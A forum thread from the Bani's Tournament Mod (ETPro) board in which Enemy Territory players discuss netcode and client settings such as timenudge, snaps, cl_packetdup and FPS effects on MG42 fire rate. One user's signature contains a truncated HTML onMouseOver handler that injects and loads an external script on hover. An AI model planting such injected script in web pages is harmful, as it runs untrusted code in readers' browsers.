smoothest gameplay? (maxfps, maxpackets, antilag..)

Discussion for Bani's Tournament Mod

Moderators: Forum moderators, developers

Imbroglio

Post by Imbroglio »

cl_packetdup is setting up to recieve duplicate packets, thats why i explained if you are on a server and you are having problems due to packet loss you should set this up, as for timenudge, you are right, most european leagues don't allow this, i don't think aussie leagues allow this either, but some NA leagues do, all that this does is change the time in milliseconds that your client sends a 'snap' of your shots, basically i'm sure you notice how in some servers you have to shoot behind the guy for shots to register (if the guy is running across your screen), well if you set a negative timenudge, your shots would register when your crosshair is directly on the enemy, but there is a downside, if you don't set it high enough, your shot still won't be 'dead' on, and if you set it too high, you will kill your accuracy and none of your shots will register correctly, a good way to judge timenudge is by your ping <=40 is a timenudge of 0, 40-60 = -10, 60-80 = -15, 80-100 = -20 and >100 = -25, thats how i usually follow suit and it remains true for the most part
Till DEATH do us Part
Sif=RoK=

Post by Sif=RoK= »

timenudge actually makes things seem slightly more laggy to your client, and if you have anti lag on, theres no reason you'd also use timenudge..

also, if you dont get much packet loss, personaly, i'd turn cl_packetdup to 0, since you dont need to send duplicate packets.

your prolly better of looking around at other players configs, and find one that suites your computer, increasing your fps by a bit would help more than minor differences in your net settings..
Spark2

Post by Spark2 »

uber_noob wrote:
Imbroglio wrote:increasing snaps from 20 to 40
AFAIK forces ETPro the server fps to 20, so this won't do a thing.
Still many people claim that whoever plays with snaps 20 just does it to become harder to hit, invincible and generally eats little children. :/
Rain

Post by Rain »

Spark2 wrote:Still many people claim that whoever plays with snaps 20 just does it to become harder to hit, invincible and generally eats little children. :/
These people are idiots, though, so they're just fun to laugh at and ignore.
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
>>steven!

Post by >>steven! »

but if ur making a cfg is it not worth it to just set it to 40, because not all servers force it to 20?

or am i just talking out of my ass?
defragga

Post by defragga »

Rain wrote:
Spark2 wrote:Still many people claim that whoever plays with snaps 20 just does it to become harder to hit, invincible and generally eats little children. :/

if this is true... I mean using snaps 20 and u become harder to hit ... that no lot of things seems more clear to me.
I often thought why the fuck I cant hit someone, with the same aiming etc... :(
Kamel

Post by Kamel »

FYI i did a test with my old comp and my new one on the FPS vrs rate of fire in an mg42. with my geforce 2 mx400, i didn't even overheat an mg, the rate of fire was that slow. my test wa to hold the trigger down and count how long until it overheated. in a fast comp, it would overheat in around 3-5 seconds. with my comp, it would take anywhere from 15 seconds to indefinite (wouldn't overheat).

to say the change in ROF with an mg42 is major is an understatement. and, this is much to the disadvantage of the person with the low fps. some people claim that it's a good thing to not be able to overheat the mg42, but with such a low ROF it makes it misreble. the person with a high FPS can normally kill people much quicker.
"Common sense isn't very common."
Kamel

Post by Kamel »

defragga wrote:
Rain wrote:

if this is true... I mean using snaps 20 and u become harder to hit ... that no lot of things seems more clear to me.
I often thought why the fuck I cant hit someone, with the same aiming etc... :(
actually, most people probably play with a snaps of 20 because it's default. i know once as a 56ker, changing my snaps to 15 and 10 made the game much more playable. punkbuster's default was 20 snaps min, and that really pissed me off quite well.

also, i have a demo of me shooting 3 clips into a guy's head that was lagging and had the radar parts... he got them secured without a scratch on a shrub server. of course with etpro this has been fixed, but i just shared the story to exclaim that the people claiming this aren't completely incorrect.
"Common sense isn't very common."
Spark2

Post by Spark2 »

I get kicked from quite a few clanservers if I set snaps to 20. :> So I just leave it on 40, even though I think that it doesn't change a damn.